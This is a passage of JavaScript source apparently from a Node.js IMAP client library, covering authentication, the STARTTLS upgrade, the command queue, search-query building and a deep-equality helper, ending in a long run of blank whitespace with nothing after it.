                self._starttls();
                return;
            }

            if (self.serverSupports('LOGINDISABLED')) {
                err = new Error('Logging in is disabled on this server');
                err.source = 'authentication';
                return reentry(err);
            }

            var cmd;
            if (self.serverSupports('AUTH=XOAUTH') && self._config.xoauth) {
                self._caps = undefined;
                cmd = 'AUTHENTICATE XOAUTH';
                // are there any servers that support XOAUTH/XOAUTH2 and not SASL-IR?
                
                cmd += ' ' + escape(self._config.xoauth);
                self._enqueue(cmd, checkCaps);
            } else if (self.serverSupports('AUTH=XOAUTH2') && self._config.xoauth2) {
                self._caps = undefined;
                cmd = 'AUTHENTICATE XOAUTH2';
                
                cmd += ' ' + escape(self._config.xoauth2);
                self._enqueue(cmd, checkCaps);
            } else if (self._config.user && self._config.password) {
                self._caps = undefined;
                self._enqueue('LOGIN "' + escape(self._config.user) + '" "'
                              + escape(self._config.password) + '"', checkCaps);
            } else {
                err = new Error('No supported authentication method(s) available. '
                                + 'Unable to login.');
                err.source = 'authentication';
                return reentry(err);
            }
        } else
            reentry();
    });
};

Connection.prototype._starttls = function () {
    var self = this;
    this._enqueue('STARTTLS', function (err) {
        if (err) {
            self.emit('error', err);
            return self._sock.end();
        }

        self._caps = undefined;
        self._sock.removeAllListeners('error');

        var tlsOptions = {};

        tlsOptions.host = this._config.host;
        
        for (var k in this._config.tlsOptions)
            tlsOptions[k] = this._config.tlsOptions[k];
        tlsOptions.socket = self._sock;

        self._sock = tls.connect(tlsOptions, function () {
            self._login();
        });

        self._sock.on('error', self._onError);
        self._sock.on('timeout', this._onSocketTimeout);
        self._sock.setTimeout(config.socketTimeout);

        self._parser.setStream(self._sock);
    });
};

Connection.prototype._processQueue = function () {
    if (this._curReq || !this._queue.length || !this._sock || !this._sock.writable)
        return;

    this._curReq = this._queue.shift();

    if (this._tagcount === MAX_INT)
        this._tagcount = 0;

    var prefix;

    if (this._curReq.type === 'IDLE' || this._curReq.type === 'NOOP')
        prefix = this._curReq.type;
    else
        prefix = 'A' + (this._tagcount++);

    var out = prefix + ' ' + this._curReq.fullcmd;
    this.debug && this.debug('=> ' + inspect(out));
    this._sock.write(out + CRLF, 'utf8');

    if (this._curReq.literalAppendData) {
        
        this._sockWriteAppendData(this._curReq.literalAppendData);
    }
};

Connection.prototype._sockWriteAppendData = function (appendData) {
    var val = appendData;
    if (Buffer.isBuffer(appendData))
        val = val.toString('utf8');

    this.debug && this.debug('=> ' + inspect(val));
    this._sock.write(val);
    this._sock.write(CRLF);
};

Connection.prototype._enqueue = function (fullcmd, promote, cb) {
    if (typeof promote === 'function') {
        cb = promote;
        promote = false;
    }

    var info = {
        type: fullcmd.match(RE_CMD)[1],
        fullcmd: fullcmd,
        cb: cb,
        cbargs: []
    },
        self = this;

    if (promote)
        this._queue.unshift(info);
    else
        this._queue.push(info);

    if (!this._curReq
        && this.state !== 'disconnected'
        && this.state !== 'upgrading') {
        
        
        process.nextTick(function () { self._processQueue(); });
    } else if (this._curReq
               && this._curReq.type === 'IDLE'
               && this._sock
               && this._sock.writable
               && this._idle.enabled) {
        this._idle.enabled = false;
        clearTimeout(this._tmrKeepalive);
        if (this._idle.started > 0) {
            
            this.debug && this.debug('=> DONE');
            this._sock.write('DONE' + CRLF);
        }
    }
};

Connection.parseHeader = parseHeader; 

module.exports = Connection;



function escape(str) {
    return str.replace(RE_BACKSLASH, '\\\\').replace(RE_DBLQUOTE, '\\"');
}

function validateUIDList(uids, noThrow) {
    for (var i = 0, len = uids.length, intval; i < len; ++i) {
        if (typeof uids[i] === 'string') {
            if (uids[i] === '*' || uids[i] === '*:*') {
                if (len > 1)
                    uids = ['*'];
                break;
            } else if (RE_NUM_RANGE.test(uids[i]))
                continue;
        }
        intval = parseInt('' + uids[i], 10);
        if (isNaN(intval)) {
            var err = new Error('UID/seqno must be an integer, "*", or a range: '
                                + uids[i]);
            if (noThrow)
                return err;
            else
                throw err;
        } else if (typeof uids[i] !== 'number')
            uids[i] = intval;
    }
}

function hasNonASCII(str) {
    for (var i = 0, len = str.length; i < len; ++i) {
        if (str.charCodeAt(i) > 0x7F)
            return true;
    }
    return false;
}

function buildString(str) {
    if (typeof str !== 'string')
        str = '' + str;

    if (hasNonASCII(str)) {
        var buf = new Buffer(str, 'utf8');
        return '{' + buf.length + '}\r\n' + buf.toString('binary');
    } else
        return '"' + escape(str) + '"';
}

function buildSearchQuery(options, extensions, info, isOrChild) {
    var searchargs = '', err, val;
    for (var i = 0, len = options.length; i < len; ++i) {
        var criteria = (isOrChild ? options : options[i]),
            args = null,
            modifier = (isOrChild ? '' : ' ');
        if (typeof criteria === 'string')
            criteria = criteria.toUpperCase();
        else if (Array.isArray(criteria)) {
            if (criteria.length > 1)
                args = criteria.slice(1);
            if (criteria.length > 0)
                criteria = criteria[0].toUpperCase();
        } else
            throw new Error('Unexpected search option data type. '
                            + 'Expected string or array. Got: ' + typeof criteria);
        if (criteria === 'OR') {
            if (args.length !== 2)
                throw new Error('OR must have exactly two arguments');
            if (isOrChild)
                searchargs += 'OR (';
            else
                searchargs += ' OR (';
            searchargs += buildSearchQuery(args[0], extensions, info, true);
            searchargs += ') (';
            searchargs += buildSearchQuery(args[1], extensions, info, true);
            searchargs += ')';
        } else {
            if (criteria[0] === '!') {
                modifier += 'NOT ';
                criteria = criteria.substr(1);
            }
            switch (criteria) {
                
                case 'ALL':
                case 'ANSWERED':
                case 'DELETED':
                case 'DRAFT':
                case 'FLAGGED':
                case 'NEW':
                case 'SEEN':
                case 'RECENT':
                case 'OLD':
                case 'UNANSWERED':
                case 'UNDELETED':
                case 'UNDRAFT':
                case 'UNFLAGGED':
                case 'UNSEEN':
                    searchargs += modifier + criteria;
                    break;
                case 'BCC':
                case 'BODY':
                case 'CC':
                case 'FROM':
                case 'SUBJECT':
                case 'TEXT':
                case 'TO':
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    val = buildString(args[0]);
                    if (info && val[0] === '{')
                        info.hasUTF8 = true;
                    searchargs += modifier + criteria + ' ' + val;
                    break;
                case 'BEFORE':
                case 'ON':
                case 'SENTBEFORE':
                case 'SENTON':
                case 'SENTSINCE':
                case 'SINCE':
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    else if (!(args[0] instanceof Date)) {
                        if ((args[0] = new Date(args[0])).toString() === 'Invalid Date')
                            throw new Error('Search option argument must be a Date object'
                                            + ' or a parseable date string');
                    }
                    searchargs += modifier + criteria + ' ' + args[0].getDate() + '-'
                                  + MONTHS[args[0].getMonth()] + '-'
                                  + args[0].getFullYear();
                    break;
                case 'KEYWORD':
                case 'UNKEYWORD':
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    searchargs += modifier + criteria + ' ' + args[0];
                    break;
                case 'LARGER':
                case 'SMALLER':
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    var num = parseInt(args[0], 10);
                    if (isNaN(num))
                        throw new Error('Search option argument must be a number');
                    searchargs += modifier + criteria + ' ' + args[0];
                    break;
                case 'HEADER':
                    if (!args || args.length !== 2)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    val = buildString(args[1]);
                    if (info && val[0] === '{')
                        info.hasUTF8 = true;
                    searchargs += modifier + criteria + ' "' + escape('' + args[0])
                               + '" ' + val;
                    break;
                case 'UID':
                    if (!args)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    validateUIDList(args);
                    if (args.length === 0)
                        throw new Error('Empty uid list');
                    searchargs += modifier + criteria + ' ' + args.join(',');
                    break;
                    
                case 'X-GM-MSGID': 
                case 'X-GM-THRID': 
                    if (extensions.indexOf('X-GM-EXT-1') === -1)
                        throw new Error('IMAP extension not available for: ' + criteria);
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    else {
                        val = '' + args[0];
                        if (!(RE_INTEGER.test(args[0])))
                            throw new Error('Invalid value');
                    }
                    searchargs += modifier + criteria + ' ' + val;
                    break;
                case 'X-GM-RAW': 
                    if (extensions.indexOf('X-GM-EXT-1') === -1)
                        throw new Error('IMAP extension not available for: ' + criteria);
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    val = buildString(args[0]);
                    if (info && val[0] === '{')
                        info.hasUTF8 = true;
                    searchargs += modifier + criteria + ' ' + val;
                    break;
                case 'X-GM-LABELS': 
                    if (extensions.indexOf('X-GM-EXT-1') === -1)
                        throw new Error('IMAP extension not available for: ' + criteria);
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    searchargs += modifier + criteria + ' ' + args[0];
                    break;
                case 'MODSEQ':
                    if (extensions.indexOf('CONDSTORE') === -1)
                        throw new Error('IMAP extension not available for: ' + criteria);
                    if (!args || args.length !== 1)
                        throw new Error('Incorrect number of arguments for search option: '
                                        + criteria);
                    searchargs += modifier + criteria + ' ' + args[0];
                    break;
                default:
                    
                    
                    var seqnos = (args ? [criteria].concat(args) : [criteria]);
                    if (!validateUIDList(seqnos, true)) {
                        if (seqnos.length === 0)
                            throw new Error('Empty sequence number list');
                        searchargs += modifier + seqnos.join(',');
                    } else
                        throw new Error('Unexpected search option: ' + criteria);
            }
        }
        if (isOrChild)
            break;
    }
    return searchargs;
}


var pSlice = Array.prototype.slice;
function _deepEqual(actual, expected) {
    
    if (actual === expected) {
        return true;

    } else if (Buffer.isBuffer(actual) && Buffer.isBuffer(expected)) {
        if (actual.length !== expected.length) return false;

        for (var i = 0; i < actual.length; i++) {
            if (actual[i] !== expected[i]) return false;
        }

        return true;

        
        
    } else if (actual instanceof Date && expected instanceof Date) {
        return actual.getTime() === expected.getTime();

        
        
        
    } else if (actual instanceof RegExp && expected instanceof RegExp) {
        return actual.source === expected.source &&
               actual.global === expected.global &&
               actual.multiline === expected.multiline &&
               actual.lastIndex === expected.lastIndex &&
               actual.ignoreCase === expected.ignoreCase;

        
        
    } else if (typeof actual !== 'object' && typeof expected !== 'object') {
        return actual == expected;

        
        
        
        
        
        
    } else {
        return objEquiv(actual, expected);
    }
}
function isUndefinedOrNull(value) {
    return value === null || value === undefined;
}
function isArguments(object) {
    return Object.prototype.toString.call(object) === '[object Arguments]';
}
function objEquiv(a, b) {
    var ka, kb, key, i;
    if (isUndefinedOrNull(a) || isUndefinedOrNull(b))
        return false;
    
    if (a.prototype !== b.prototype) return false;
    
    
    if (isArguments(a)) {
        if (!isArguments(b)) {
            return false;
        }
        a = pSlice.call(a);
        b = pSlice.call(b);
        return _deepEqual(a, b);
    }
    try {
        ka = Object.keys(a);
        kb = Object.keys(b);
    } catch (e) {
        return false;
    }
    
    
    if (ka.length !== kb.length)
        return false;
    
    ka.sort();
    kb.sort();
    
    for (i = ka.length - 1; i >= 0; i--) {
        if (ka[i] != kb[i])
            return false;
    }
    
    
    for (i = ka.length - 1; i >= 0; i--) {
        key = ka[i];
        if (!_deepEqual(a[key], b[key])) return false;
    }
    return true;
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             